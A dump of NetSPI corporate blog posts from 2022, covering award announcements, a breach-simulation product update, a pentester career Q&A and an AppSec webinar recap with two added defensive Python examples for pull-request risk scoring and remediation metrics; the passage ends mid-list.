“It is tough to truly articulate how much this award means to me. For me, this is the culmination of four years of incredibly hard work, so to see how far we have come as a company but then also be publicly recognized for it is such a testament to what we have accomplished thus far. Frankly, I feel like we are just getting started! I am such a small part in this puzzle, as my four years of hard work pale in comparison to the 10+ years of hard work so many of our technical and thought leaders have put in to build our incredible reputation.
What makes NetSPI the most innovative in pentesting is our unique combination of industry-leading technical talent, sophisticated use of bleeding edge technology, unrelenting focus on customer experience, and a culture that promotes and rewards the highest levels of moral and ethical standards.”
Nabil Hannan, Managing Director
“It’s a true feeling of pride knowing that I am part of an organization that is being recognized for excellence in our space. This award is a great validation of the work we have been doing as a company and that we are truly having an impact on the world of penetration testing.”
Connect With NetSPI at the 2022 RSA Conference
It’s clear that the team cannot wait to see many new and familiar faces this week at the conference and discuss how we have seen the industry “transform” over the past two years, and where it’s headed next.
Book a meeting with us to discuss penetration testing in-depth or explore our other services.
[post_title] => 2022 RSA Conference: What Makes Us the Most Innovative Pentesting Company?
[post_excerpt] => Learn what our team is looking forward to most at the 2022 RSA Conference and what being awarded the most innovative penetration testing company means to them.
[post_modified] => 2023-01-23 15:10:33
[guid] => https://www.netspi.com/?p=27877
)
[36] => WP_Post Object
(
[ID] => 27870
[post_date] => 2022-06-06 12:00:00
[post_content] =>
NetSPI honored in the coveted 10th Annual Global InfoSec Awards at the 2022 RSA Conference.
Minneapolis, MN – NetSPI, the leader in enterprise penetration testing and attack surface management, was awarded "Most Innovative in Penetration Testing" from Cyber Defense Magazine (CDM), the industry’s leading electronic information security magazine.
NetSPI represents the key criteria that CDM and the Global InfoSec Award judges look for in cybersecurity winners: understanding tomorrow’s threats, today, and innovating in unexpected ways that can help mitigate cyber risk and get one step ahead of the next breach.
Traditional pentesting has not kept pace with the realities of business agility and cybercriminal sophistication. NetSPI has revolutionized the Penetration Testing as a Service (PTaaS) delivery model to enable organizations to view penetration testing results in real time, scale to support innovation, orchestrate faster remediation, perform always-on continuous pentesting, and more.
NetSPI’s Resolve penetration testing platform, backed by its global team of expert pentesters, helps clients improve vulnerability management and remediation processes, better understand and reduce risk, manage the evolving attack surface, and leverages automation to enable manual pentesting to find business critical vulnerabilities that tools alone cannot uncover.
“We’re thrilled to be honored by Cyber Defense Magazine,” said Aaron Shilts, President and CEO of NetSPI. “Our technology-powered services are disrupting the penetration testing industry, and this recognition is a true testament to our global team’s unwavering dedication to delivering world-class penetration testing services.”
“NetSPI embodies what we look for in leading innovators within the cybersecurity industry,” said Gary S. Miliefsky, Publisher of Cyber Defense Magazine. “NetSPI’s platform driven, human delivered approach to offensive cybersecurity provides a unique opportunity for organizations to think strategically about their proactive security efforts, instead of viewing penetration testing as a check-the-box activity.”
For more information on NetSPI, visit the company website or speak with the company’s penetration testing experts at booth #4605 at RSA Conference 2022. Learn more about this year’s Global InfoSec Award winners in this full list here.
About CDM InfoSec Awards
This is Cyber Defense Magazine’s tenth year of honoring InfoSec innovators from around the Globe. Our submission requirements are for any startup, early stage, later stage, or public companies in the INFORMATION SECURITY (INFOSEC) space who believe they have a unique and compelling value proposition for their product or service. Learn more at www.cyberdefenseawards.com
About Cyber Defense Magazine
Cyber Defense Magazine is the premier source of cyber security news and information for InfoSec professions in business and government. We are managed and published by and for ethical, honest, passionate information security professionals. Our mission is to share cutting-edge knowledge, real-world stories and awards on the best ideas, products and services in the information technology industry. We deliver electronic magazines every month online for free, and special editions exclusively for the RSA Conferences. CDM is a proud member of the Cyber Defense Media Group. Learn more about us at https://www.cyberdefensemagazine.com and visit https://www.cyberdefensetv.com and https://www.cyberdefenseradio.com to see and hear some of the most informative interviews of many of these winning company executives. Join a webinar at https://www.cyberdefensewebinars.com and realize that infosec knowledge is power.
[post_title] => NetSPI Named "Most Innovative in Penetration Testing" in the Global InfoSec Awards
[post_excerpt] => Read why NetSPI was selected as the most innovative pentesting company in the 2022 Global InfoSec Awards.
[post_modified] => 2023-01-23 15:10:34
[guid] => https://www.netspi.com/?p=27870
)
[37] => WP_Post Object
(
[ID] => 27843
[post_date] => 2022-06-01 08:00:00
[post_content] =>
Organizations leverage the platform-driven, human-delivered service to measure and continuously improve the efficacy of detective controls and MSSP coverage.
Minneapolis, MN – NetSPI, the leader in penetration testing and attack surface management, today announced new Breach and Attack Simulation (BAS) enhancements to meet increased market demand for improved threat detection. With the combination of the AttackSim cloud-native technology platform and hands-on counsel from NetSPI’s expert penetration testing team, organizations can continuously test their detective controls against real-world attack tactics, techniques, and procedures (TTPs).
According to NetSPI data, only 20% of common attack behaviors are caught by out-of-the-box detective controls (EDR, SIEM, MSSPs) – leaving organizations with a false sense of security. The updates to NetSPI’s Breach and Attack Simulation allow detection engineers to measure their ability to detect common adversary behaviors and ultimately prioritize detection development as well as investments.
Following the initial collaborative assessment with NetSPI’s experts, the AttackSim technology platform is provided to organizations for continuous testing and improvement. The platform features many new updates including:
Seamless use, regardless of skill level: An enhanced user experience (UX) and a refined user interface (UI) can be used by experts and novices alike.
New automated plays and playbooks: Detailed manual procedures for reproducing attacker behavior, as well as consistently updated security playbooks, allow organizations to better strengthen their security posture. With the latest updates, NetSPI has nearly 300 attack plays that can be used to test detective controls.
Enhanced reporting: Security teams now have additional data and metrics to work with, such as peer comparison, year-over-year reporting, and telemetry flow analysis. New reports that support programmatic, tactic, technique, and procedure (TTP) summary metrics are also now available.
“Indicators of Compromise have become less useful as the threat landscape evolves at a breakneck speed,” said Cody Chamberlain, Head of Product at NetSPI. “To stay ahead of malicious actors, organizations must shift their gaze to detect attackers before something bad happens. The NetSPI AttackSim platform, combined with the power of our skilled team of penetration testers, lets organizations continuously simulate real attack behavior, providing better insight into the efficacy of their detective controls.”
“Small and medium-sized organizations with limited personnel often rely on MSSPs to implement detections and operate similarly to a security operations center (SOC),” said Scott Sutherland, Senior Director, Adversary Simulation and Infrastructure Testing at NetSPI. “We built Breach and Attack Simulation not only to improve detections, but also to enable organizations to validate MSSP coverage and better understand the scope of their agreements.”
NetSPI will be demoing the AttackSim platform and its new capabilities during RSA Conference 2022 at booth #4605 in the North Expo Exhibit Hall. Schedule a meeting with the team.
[post_title] => NetSPI’s New Breach and Attack Simulation Enhancements Help Organizations Achieve Behavior-Based Threat Detection
[post_excerpt] => Learn how organizations can leverage breach and attack simulation for continuous detective control reviews, to evaluate MSSP coverage, and improve behavior-based threat detection.
[post_name] => breach-and-attack-simulation-enhancements-threat-detection
[post_modified] => 2023-01-23 15:10:34
[post_modified_gmt] => 2023-01-23 21:10:34
[guid] => https://www.netspi.com/?p=27843
)
[38] => WP_Post Object
(
[ID] => 27715
[post_author] => 91
[post_date] => 2022-04-28 13:27:28
[post_date_gmt] => 2022-04-28 18:27:28
[post_content] =>
The competitive business awards recognize entrepreneurs and leaders of high-growth companies who think big to succeed
Minneapolis, MN – Ernst & Young LLP (EY US) today announced that Aaron Shilts, CEO and President of NetSPI, was named an Entrepreneur Of The Year® 2022 Heartland Award finalist. He is one of 28 finalists who were selected by a panel of independent judges based on entrepreneurial spirit, purpose, growth, and impact, among other core contributions and attributes.
“What an honor to be listed next to some of the top business leaders in this region – arguably, some of the best in the country,” said Aaron. “But behind every great leader, is a team of even greater leaders. Without the support of every individual at NetSPI, we would not have achieved the high-growth, success, and innovation that we saw over the past two years. Together we’ve led NetSPI to become THE leader in offensive cybersecurity, helping to secure many of the world’s most prominent organizations.”
Regional award winners will be announced on June 9, 2022, at The Fillmore Minneapolis. The regional winners will then be considered by the National independent judging panel, and National awards will be presented in November at the Strategic Growth Forum®, one of the nation’s most prestigious gatherings of high-growth, market-leading companies. The Entrepreneur Of The Year National Overall Award winner will then move on to compete for the EY World Entrepreneur Of The Year™ Award in June 2023.
“The 2022 Entrepreneur Of The Year finalists have shown us that ambition, courage, ingenuity and empathy are key to driving change,” said Dominic Iannazzo, Heartland Program Co-director. “They have a mindset that drives them to strive for more and an unwavering commitment to their companies, customers and communities.”
For over 35 years, EY US has celebrated the unstoppable entrepreneurs who are building a more equitable, sustainable, and prosperous world for all. The Entrepreneur Of The Year program has recognized more than 10,000 US executives since its inception in 1986.
###
About NetSPI
NetSPI is the leader in enterprise penetration testing and attack surface management, partnering with nine of the top 10 U.S. banks, three out of the five FAANG companies, the world’s largest healthcare organizations, the largest global cloud providers, and many of the Fortune® 500. Its platform-driven, human-delivered Penetration Testing, Adversary Simulation, and Attack Surface Management services are supported by dynamic technology platforms and a dedicated team of global penetration testing experts. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.
About the Sponsors
Entrepreneur Of The Year is the world’s most prestigious business awards program for unstoppable entrepreneurs. These visionary leaders deliver innovation, growth and prosperity that transform our world. The program engages entrepreneurs with insights and experiences that foster growth. It connects them with their peers to strengthen entrepreneurship around the world. Entrepreneur Of The Year is the first and only truly global awards program of its kind.
It celebrates entrepreneurs through regional and national awards programs in more than 145 cities in over 60 countries. National overall winners go on to compete for the EY World Entrepreneur Of The Year™ title. Visit ey.com/us/eoy.
About EY Private
As Advisors to the ambitious™, EY Private professionals possess the experience and passion to support private businesses and their owners in unlocking the full potential of their ambitions. EY Private teams offer distinct insights born from the long EY history of working with business owners and entrepreneurs. These teams support the full spectrum of private enterprises including private capital managers and investors and the portfolio businesses they fund, business owners, family businesses, family offices and entrepreneurs. Visit ey.com/us/private.
About EY
EY exists to build a better working world, helping create long-term value for clients, people and society and build trust in the capital markets.
Enabled by data and technology, diverse EY teams in over 150 countries provide trust through assurance and help clients grow, transform and operate.
Working across assurance, consulting, law, strategy, tax and transactions, EY teams ask better questions to find new answers for the complex issues facing our world today.
EY refers to the global organization, and may refer to one or more, of the member firms of Ernst & Young Global Limited, each of which is a separate legal entity. Ernst & Young Global Limited, a UK company limited by guarantee, does not provide services to clients. Information about how EY collects and uses personal data and a description of the rights individuals have under data protection legislation are available via ey.com/privacy. EY member firms do not practice law where prohibited by local laws. For more information about our organization, please visit ey.com.
Ernst & Young LLP is a client-serving member firm of Ernst & Young Global Limited operating in the US.
Media Contacts: Tori Norris, NetSPI Director of Brand and Communications victoria.norris@netspi.com (630) 258-0277
[post_title] => EY Announces NetSPI CEO Aaron Shilts as an Entrepreneur Of The Year® 2022 Heartland Award Finalist
[post_excerpt] => Learn why Aaron Shilts is being recognized as a top Minnesota business leader alongside 28 other leaders and entrepreneurs in the Heartland region.
[post_name] => ey-entrepreneur-of-the-year-heartland-2022-aaron-shilts
[post_modified] => 2023-01-23 15:10:40
[post_modified_gmt] => 2023-01-23 21:10:40
[guid] => https://www.netspi.com/?p=27715
)
[39] => WP_Post Object
(
[ID] => 27690
[post_author] => 91
[post_date] => 2022-04-26 07:00:00
[post_date_gmt] => 2022-04-26 12:00:00
[post_content] =>
At NetSPI, we invest heavily in our processes and technology to continuously perform high-quality penetration testing services for our clients. But ask any of our clients and they’ll tell you that the greatest quality that sets NetSPI apart from other pentesting vendors is our people – arguably the greatest and most important investment we can make.
It’s no secret that the cybersecurity and technology industry is experiencing a 0% unemployment rate, and the competition is fierce for qualified talent that is not only technical but also understands the implications of cybersecurity.
Case in point: NetSPI recently attended the Secure World Boston cybersecurity event. In one session, the presenter asked a room of more than 50 CISOs and other security leaders to raise their hand if they had open cybersecurity positions they were struggling to fill. Nearly every hand in the room went up.
One way NetSPI is investing and bringing in new and qualified talent is the NetSPI University (NetSPI U) program. This penetration testing training program is specifically for entry-level talent looking to begin their career in cybersecurity.
Since its inception in 2018, 83% of all NetSPI U “graduates” have continued their careers at NetSPI, many of whom are now in leadership positions.
This competitive training program is available in Minneapolis, Portland (OR), Lehi, and Pune, or remotely depending on the situation. You join as an Associate Security Consultant and receive hands-on penetration testing training focused on NetSPI’s proven testing methodology, along with competitive benefits and the opportunity to be mentored by some of the best talent in cybersecurity. [To view our open pentesting jobs, visit our careers page]
To share a first-hand perspective on what it’s like to become a pentester, in this blog, we asked four NetSPI U alumni to share their experiences getting into and working in the pentesting industry.
What did you wish you knew before you transitioned into cybersecurity?
Karin Knapp, Security Consultant (NetSPI U Class of 2021):
“I wish I had known more about a career in cybersecurity while in school. With limited experience in cybersecurity before I applied to NetSPI U, I wish I had taken more electives that would've been more applicable to my current role instead of what I thought I wanted to do before I graduated.”
Matt Ostrom, Managing Consultant (NetSPI U Class of 2018):
“Pentesting is a team job. There is no room, nor should there be room for ‘rockstars’.”
Marissa Allen, Security Consultant II (NetSPI U Class of 2020):
“I wish I had known more certainly what cybersecurity career path I wanted to take. Everything is interesting, and it can take a while to narrow down your interests in the field given there are so many paths you can take.”
Sam Horvath, Technical Client Director (NetSPI U Class of 2018):
“Ignorance is bliss – once you know how insecure most systems are, you’ll be perpetually ‘paranoid’ to some degree.”
What is one piece of advice you’d give to someone who wants to get started in pentesting?
Karin:
“Take a look at websites designed to help you practice your pentesting skills like PortSwigger, HacktheBox, or TryHackMe. These are great ways to familiarize yourself with the basics of pentesting with hands-on, guided practice.”
Matt:
“Start gathering knowledge however you can. Whether that be through reading books or blogs, setting up your home lab of virtual machines – in a cloud environment or something like VirtualBox – testing vulnerable web applications, etc. Every little bit helps.”
Marissa:
“I think the best advice I can give is don’t be afraid to ask questions. There is a ton of information out there, and it can be difficult to sort through. There are many great sites that you can learn new skills from and people that will be willing to guide you if you reach out.”
Sam:
“Start meditating and/or doing intense cardio daily. Being able to put your brain in a calm space at the end of the day after exhausting your critical thinking/problem-solving centers is the key to rejuvenation and rest.”
What characteristics make a great pentester? Why?
Karin:
“Having a passion to always want to learn more about cybersecurity and pentesting is probably the best characteristic in my opinion. The ability to get creative and think outside of the box, and to not give up on difficult problems is also super valuable.”
Matt:
“First, someone who is determined to succeed. Sometimes, we’ll have to go through 99 different failures on exploiting a vulnerability before finding the one that works. Second, someone who loves learning. The cybersecurity industry is constantly changing and keeping pace with those changes is important. And lastly, someone who genuinely wants to make a difference. The work we do is incredibly important, and I feel like our work matters in keeping our clients safe.”
Marissa:
“If you like research, puzzles, and problem solving, then you've got this. You’ll come across areas in your penetration tests where you will need to dig into a problem. If you have an investigative personality, then you have the tenacity to go down the rabbit hole and find out if there is a vulnerability or not.”
Sam:
“Perseverance. Cracking the hardest problems and puzzles means you can’t get discouraged easily. 99% of people won’t get it on the first try, and that’s okay.”
What was the most rewarding/beneficial part of your NetSPI U experience?
Karin:
“I realized shortly before NetSPI U that I wanted a career in cybersecurity, but I thought I would have to go back to school to be able to get a job in the field. NetSPI U taught me everything that I needed to know and helped me build a solid foundation to be a successful pentester. In addition, I got to meet some awesome people such as those from my NetSPI U class and people who were my mentors in the program. They are the reason I look forward to coming into the office even a year after I ’graduated’.”
Matt:
“NetSPI U gives people the opportunity to break into the cybersecurity industry. The idea/concept of the NetSPI U program is a rarity. Being able to go from having a little bit of cybersecurity experience to feeling like I’m confident and ready to start executing on client projects after the program was, and continues to be, invaluable. Additionally, learning from people who have spent years in the industry was crucial. The depth of knowledge they were able to share during the program is the reason why it keeps succeeding and producing stellar pentesters.”
Marissa:
“NetSPI U gave me the knowledge and tools to succeed in my career. The program helps future pentesters succeed in that aspect by pairing them with a seasoned pentester as their mentor to provide guidance and answer any questions. It helped me better understand the breadth of work being performed. The program ultimately enabled me to figure out which direction I wanted to grow in my career.”
Sam:
“Learning that I had the ability and the drive to develop and succeed in the information security space was a validation of years of work in learning the basics of computer science. Finding a fantastic set of colleagues to learn, grow, and develop friendships within that process was just a bonus.”
The Future of Penetration Testing
A career in cybersecurity is a lucrative and rewarding one for the foreseeable future. As cybercrime continues to rise, companies will keep investing in services such as penetration testing. Becoming a pentester is not for the faint of heart, but if you have the perseverance to see a project through to the end, as Karin, Matt, Marissa, and Sam described, penetration testing could be for you.
[post_title] => Getting Started as a Pentester: Cybersecurity Career Q&A
[post_excerpt] => NetSPI U alumni share their experience breaking into a career in cybersecurity and advice on how to get started as a pentester.
[post_name] => cybersecurity-career-getting-started-as-a-pentester
[post_modified] => 2023-01-23 15:10:41
[post_modified_gmt] => 2023-01-23 21:10:41
[guid] => https://www.netspi.com/?p=27690
)
[40] => WP_Post Object
(
[ID] => 27576
[post_author] => 91
[post_date] => 2022-03-30 10:49:00
[post_date_gmt] => 2022-03-30 15:49:00
[post_content] =>
On March 30, 2022, NetSPI was featured in the VentureBeat article, What’s Happening in the Attack Surface Market: Mitigating Threats in the Cloud Era. Preview the article below, or read the full article online.
+ + +
For an increasing number of organizations, the explosion in attack surfaces has reached unmanageable levels amid the COVID-19 pandemic and the widespread adoption of cloud services. In fact, research shows seven in 10 organizations have been compromised by an unknown or unmanaged asset.
As remote working has grown more popular during the pandemic, environments that sprawl across on-premises and cloud environments have expanded enterprise attack surfaces to the point where they can’t be secured through traditional IT security approaches alone.
NetSPI Brings Penetration Testing to the ASM Market
As the need for ASM solutions increases, many security vendors are beginning to move into the space. One such provider is NetSPI, a penetration testing-as-a-service provider that has raised $100 million in funding to date and last month launched a new ASM tool that incorporates human penetration testing.
NetSPI’s solution automatically scans attack surface assets and alerts users to high-risk exposure, while NetSPI’s internal team evaluates the risk posed by discovered issues and provides the organization with guidance on how to remediate them.
The use of human penetration testing is unique in the market, and enables organizations to benefit from automated asset scanning alongside the rich risk insights of an experienced penetration testing team, who can identify what threat an exposure actually poses in a way that automated solutions cannot.
[post_title] => VentureBeat: What’s Happening in the Attack Surface Market: Mitigating Threats in the Cloud Era
[post_excerpt] => On March 30, 2022, NetSPI was featured in the VentureBeat article, What’s Happening in the Attack Surface Market: Mitigating Threats in the Cloud Era.
[post_name] => venturebeat-whats-happening-in-the-attack-surface-market
[post_modified] => 2023-01-23 15:10:46
[post_modified_gmt] => 2023-01-23 21:10:46
[guid] => https://www.netspi.com/?p=27576
)
[41] => WP_Post Object
(
[ID] => 27549
[post_author] => 91
[post_date] => 2022-03-29 07:00:00
[post_date_gmt] => 2022-03-29 12:00:00
[post_content] =>
Silos still exist in cybersecurity, where related functions and activities operate in isolation from other parts of the organization. This is especially true of application security.
Various tests occur throughout the software development life cycle (SDLC), but they often lack context or are not in sync with other security activities, leaving organizations with gaps in coverage and a narrow view of their AppSec program.
To help change the way we approach application security testing today, three AppSec experts came together to discuss this topic in the webinar, Application Security In Depth: Understanding The Three Layers Of AppSec Testing. In this blog, we share key takeaways from the discussion, which features Moshe Zioni, VP of Security Research at Apiiro; Nabil Hannan, Managing Director at NetSPI; and Samir Sherif, CISO at Imperva.
Why Context is Key During Application Security Testing
Contextual data is important. It helps organizations understand their SDLC through a broad lens and assists in prioritization of workflows and next steps. Not all vulnerabilities identified will be fixed immediately, and context is key to remediating those that pose the highest risk to the business first and fastest.
Moshe shares the following five different contextual triggers security leaders should pay close attention to in the SDLC.
Five Contextual Triggers to Leverage in the SDLC
Design: At the design stage, prioritize which threat modeling sessions to hold. If several designs are moving through an agile development life cycle, prioritize them by balancing the capacity you have as security practitioners against the actual deployment schedule. This stage is also the point to trigger a contextual compliance review: if something is required for compliance and you did not prepare for it, going back to implement it later is costly and difficult.
Branch: After a pull request, you should have context around the code itself. First, analyze the code, by review or with an automated tool, to enrich the commit with data about what it changes. From this context point you can derive multiple triggers according to your workflows, how lean you want to be, and the priority of the commit itself. A commit that is high priority because it touches sensitive data or comes from a new developer carries more weight; these context points form a weighting system that automates the risk questionnaire and code governance. Once the automation is in place, you have a cadence and governance rules for when to trigger each activity instead of triggering everything on every commit.
Repository: At the repository level you gain context about the application as a whole: its business impact, what information passes through it, and who its customers are. These points give you a coherent view of what must be done to secure the application, especially where compliance rules apply. The repository is not to be overlooked and should have its own triggers and workflows.
CI/CD: The last point of the coding journey is the CI/CD system, or whatever integration and deployment process is in use. CI/CD is continuous, so cycles run throughout the organization, and the pipeline itself needs a lean and safe process. Integrity and provenance of the CI/CD pipeline matter more as automation increases, which means integrating integrity checks across the CI/CD life cycle.
Production: Before production, you should have another set of eyes look at the information for anything that looks suspicious.
Along with the context points and material changes, Moshe explains that “all of this comes together to create a complete picture and mission, which is an ongoing cycle that doesn’t disrupt and interrupt the deployment process but gives you confidence on what kind of design and code you’re going to push to the cloud.”
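A concrete form of the Branch and Repository context points above, as an added example that is not code from the webinar or from NetSPI, Apiiro or Imperva: a small Python policy that weights a pull request by what it touches, who wrote it, how large it is and what the repository handles, then maps that weight to the activities to trigger rather than running everything on every commit. The path keywords, weights, thresholds, repository labels and sample pull requests are all assumptions to be tuned per organization.

```python
"""Context-weighted security triggers for a pull request.

Added example, not code from the webinar or from NetSPI, Apiiro or Imperva.
Every keyword, weight and threshold below is an assumption.
"""
from dataclasses import dataclass, field

# Path segments that mark security-sensitive code, with a weight per category.
SENSITIVE_SEGMENTS = {
    "auth": (("auth", "login", "session", "oauth"), 5),
    "crypto_or_secrets": (("crypto", "kms", "secret", "vault"), 5),
    "payments": (("payment", "billing"), 4),
    "infrastructure": (("infra", "terraform", "k8s", "helm"), 3),
}
DEPENDENCY_MANIFESTS = {"requirements.txt", "package.json", "package-lock.json",
                        "go.mod", "go.sum", "pom.xml", "Pipfile.lock"}


@dataclass
class PullRequest:
    repo: str
    author: str
    author_tenure_days: int
    changed_files: list
    lines_changed: int


@dataclass
class RepoContext:
    handles_pii: bool = False
    handles_payment_data: bool = False
    internet_facing: bool = False
    compliance_regimes: tuple = ()   # labels only, e.g. ("SOC 2",)


@dataclass
class Decision:
    score: int = 0
    reasons: list = field(default_factory=list)
    triggers: list = field(default_factory=list)


def classify_paths(paths):
    """Map each sensitive category to the changed paths that fall under it."""
    hits = {}
    for path in paths:
        segments = [s.lower() for s in path.split("/")]
        for category, (keywords, _weight) in SENSITIVE_SEGMENTS.items():
            if any(seg.startswith(k) for seg in segments for k in keywords):
                hits.setdefault(category, []).append(path)
    return hits


def score_pull_request(pr: PullRequest, repo: RepoContext) -> Decision:
    d = Decision()
    # Code context: what the diff touches.
    hits = classify_paths(pr.changed_files)
    for category, paths in hits.items():
        d.score += SENSITIVE_SEGMENTS[category][1]
        d.reasons.append(f"touches {category}: {', '.join(paths)}")
    manifests = [p for p in pr.changed_files
                 if p.rsplit("/", 1)[-1] in DEPENDENCY_MANIFESTS]
    if manifests:
        d.score += 3
        d.reasons.append(f"dependency change: {', '.join(manifests)}")
    # Author context: a new developer's commit gets a heavier weight.
    if pr.author_tenure_days < 90:
        d.score += 2
        d.reasons.append(f"author tenure {pr.author_tenure_days} days")
    # Size context: large diffs are hard to review by eye.
    if pr.lines_changed > 500:
        d.score += 2
        d.reasons.append(f"large diff ({pr.lines_changed} lines)")
    # Repository context: business impact multiplies the code-level weight.
    multiplier = 1
    if repo.handles_pii or repo.handles_payment_data:
        multiplier += 1
    if repo.internet_facing:
        multiplier += 1
    d.score *= multiplier
    # Governance rules: which activities the resulting weight triggers.
    d.triggers.append("sast")                      # cheap, always on
    if manifests:
        d.triggers.append("sca")
    if d.score >= 6:
        d.triggers.append("manual_secure_code_review")
    if d.score >= 12 or hits.keys() & {"auth", "crypto_or_secrets"}:
        d.triggers.append("threat_model_session")
    if repo.compliance_regimes and (manifests or hits.keys() & {"payments", "crypto_or_secrets"}):
        d.triggers.append("compliance_review")
    return d


# Constructed sample input (assumed repositories and pull requests).
REPOS = {
    "customer-portal": RepoContext(handles_pii=True, internet_facing=True,
                                   compliance_regimes=("SOC 2",)),
    "edge-gateway": RepoContext(internet_facing=True),
    "marketing-site": RepoContext(internet_facing=True),
}
SAMPLE_PRS = [
    PullRequest("marketing-site", "dana", 400, ["README.md", "docs/faq.md"], 20),
    PullRequest("edge-gateway", "lee", 700, ["terraform/prod/main.tf"], 40),
    PullRequest("customer-portal", "sam", 30,
                ["src/auth/session_store.py", "requirements.txt"], 120),
]


def evaluate_all(prs=SAMPLE_PRS, repos=REPOS):
    return {pr.repo: score_pull_request(pr, repos[pr.repo]) for pr in prs}


if __name__ == "__main__":
    for repo_name, decision in evaluate_all().items():
        print(f"{repo_name}: score={decision.score} triggers={decision.triggers}")
        for reason in decision.reasons:
            print("   -", reason)
```

Run as a script it prints, per sample pull request, the score, the reasons behind it and the activities triggered: the documentation-only change gets static analysis alone, the Terraform change in an internet-facing repository earns a manual review, and the authentication change by a new developer in a PII-handling, internet-facing repository also triggers software composition analysis, a threat model session and a compliance review. The point is the shape, not the numbers: the context is recorded in `reasons` so the governance rule that fired is auditable.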
Best Practices for Application Penetration Testing and Secure Code Review
Many different application security testing activities are completed throughout the SDLC, but penetration testing and secure code review are two of the most common and effective.
A larger concern, however, is that organizations struggle to get value from these tests because they lack clarity on the results they want to achieve. Below are five best practices organizations can implement to optimize these tests.
Five Best Practices for Application Penetration Testing
Determine your business objectives. Organizations need to have a clear understanding of their business objectives and how they will make money. This will aid in building a proper application security roadmap and help organizations allocate resources and identify which areas to focus on.
Contextualize the vulnerabilities. Don’t just perform a security test, fix the vulnerabilities identified. This means understanding the vulnerabilities, contextualizing them based on the business risks, and figuring out which ones to remediate first.
Acquire buy-in from finance and risk leadership. Gaining support from finance, the Chief Compliance Officer, and other risk leaders and partners will enable organizations to perform testing on a regular cadence with the appropriate resources and budget for testing.
Perform proper threat modeling and design level analysis. Then, utilize the results to determine new and creative ways that attackers may be trying to gain access to company-wide assets or software that can’t be derived from regular pentesting.
Invest in continuous pentesting. Point-in-time testing is no longer sufficient if organizations want to protect their software and assets. Instead, it’s time to invest in continuous pentesting to keep up with the rate of change organizations face today.
One of the earliest times to detect a vulnerability is when the code is being written. Nabil shared this advice on how to start, “From a secure code review perspective, make sure you start aligning different tooling technology and code review activities with your software development cadence so that they are in lockstep in how they’re performed.”
Here are six additional best practices for secure code review.
Six Best Practices When Performing a Secure Code Review
Don’t get complacent. Organizations should be rotating the people who are reviewing source code over time, so everyone is immersed in devising creative ways to discover and fix vulnerabilities.
Build a methodology for code review. Create a champions program where developers are being trained to write secure code from the get-go. Then reward them for their efforts.
Transparency is key. Similar to the pentesting best practice above, organizations need to make sure they’re involving folks in leadership and other areas. This means explaining the need for security testing at the code level and how tooling, manual reviews, and automation are helpful with the development process and help build the software securely.
Prioritize onboarding and scan frequency. Organizations should be testing the right assets, the right applications, and at the right frequency and key timeframe.
Provide the proper training. Determine how to deal with the different bugs and vulnerabilities that were discovered. This is where it’s important that developers are equipped with the right training and education to fix these vulnerabilities. Consider gamifying training so that people can consume remediation guidance in bite-sized pieces.
Measure and improve. Aim for continuous improvement. To accomplish this, organizations need to capture key metrics and evaluate remediation rates. Are there vulnerabilities that keep recurring? Are developers writing better quality code over time? Can certain security controls be abstracted into a secure development framework to reduce the cost, time, and effort it takes to fix vulnerabilities?
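The figures the last practice asks for, computed from a constructed findings export as an added example that is not code from the webinar or from any of the speakers’ companies: remediation rate, median days to remediate by severity, vulnerability classes that recur in the same repository (the signal that a framework-level control is needed rather than another one-off fix), and open findings past an assumed per-severity SLA. The findings, the column layout and the SLA values are all assumptions.

```python
"""Remediation metrics for an application security program.

Added example, not code from the webinar or the speakers' companies. The
findings, their column layout and the SLA values are constructed assumptions.
"""
from collections import Counter, defaultdict
from datetime import date
from statistics import median

# Constructed sample export: (id, repo, cwe, severity, opened, closed or None).
FINDINGS = [
    ("F-1", "customer-portal", "CWE-89",  "critical", date(2022, 1, 10), date(2022, 1, 14)),
    ("F-2", "customer-portal", "CWE-79",  "high",     date(2022, 1, 12), date(2022, 2, 20)),
    ("F-3", "customer-portal", "CWE-89",  "critical", date(2022, 2, 3),  date(2022, 2, 5)),
    ("F-4", "customer-portal", "CWE-79",  "high",     date(2022, 3, 1),  None),
    ("F-5", "billing-api",     "CWE-798", "high",     date(2022, 1, 20), date(2022, 1, 21)),
    ("F-6", "billing-api",     "CWE-798", "high",     date(2022, 2, 15), date(2022, 2, 16)),
    ("F-7", "billing-api",     "CWE-22",  "medium",   date(2022, 2, 18), None),
    ("F-8", "edge-gateway",    "CWE-20",  "low",      date(2022, 3, 4),  date(2022, 3, 30)),
]

# Assumed remediation SLA in days per severity.
SLA_DAYS = {"critical": 7, "high": 30, "medium": 90, "low": 180}


def remediation_rate(findings):
    """Share of findings that have been closed."""
    if not findings:
        return 0.0
    return sum(1 for f in findings if f[5] is not None) / len(findings)


def median_days_to_remediate(findings):
    """Median open-to-close time per severity, over closed findings only."""
    days_by_severity = defaultdict(list)
    for _fid, _repo, _cwe, severity, opened, closed in findings:
        if closed is not None:
            days_by_severity[severity].append((closed - opened).days)
    return {sev: median(days) for sev, days in days_by_severity.items()}


def recurring_classes(findings, min_count=2):
    """(repo, CWE) pairs seen min_count or more times: the same class of bug
    fixed and reintroduced in the same code base."""
    counts = Counter((repo, cwe) for _fid, repo, cwe, *_rest in findings)
    return {key: n for key, n in counts.items() if n >= min_count}


def open_sla_breaches(findings, today, sla_days=SLA_DAYS):
    """IDs of still-open findings older than their severity's SLA."""
    return [fid for fid, _repo, _cwe, sev, opened, closed in findings
            if closed is None and (today - opened).days > sla_days[sev]]


def summarize(findings=FINDINGS, today=date(2022, 4, 1)):
    """All four metrics in one report dictionary."""
    return {
        "remediation_rate": remediation_rate(findings),
        "median_days_to_remediate": median_days_to_remediate(findings),
        "recurring_classes": recurring_classes(findings),
        "sla_breaches": open_sla_breaches(findings, today),
    }


if __name__ == "__main__":
    for name, value in summarize().items():
        print(f"{name}: {value}")
```

On the sample data the report shows three quarters of findings closed, SQL injection and hard-coded credentials each recurring in the same repository, and one high-severity finding past its SLA. Tracking the same figures release over release is what turns the "are developers writing better code over time" question into something the program can answer.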
Solutions to Consider in the Implementation Journey
In application security, risk is one of the key drivers in delivering effective solutions for your application security program. “At the end of the day, it’s really about risk. How you manage risk and how you manage resiliency for your solutions. Not only from the AppSec perspective but also from the perspective of running your business and supporting the business that you’re in today,” shared Samir.
Samir explained that the three biggest drivers for security testing include:
How well am I protecting customer data?
How effectively am I building resilience for the technologies that I am providing as a service to customers?
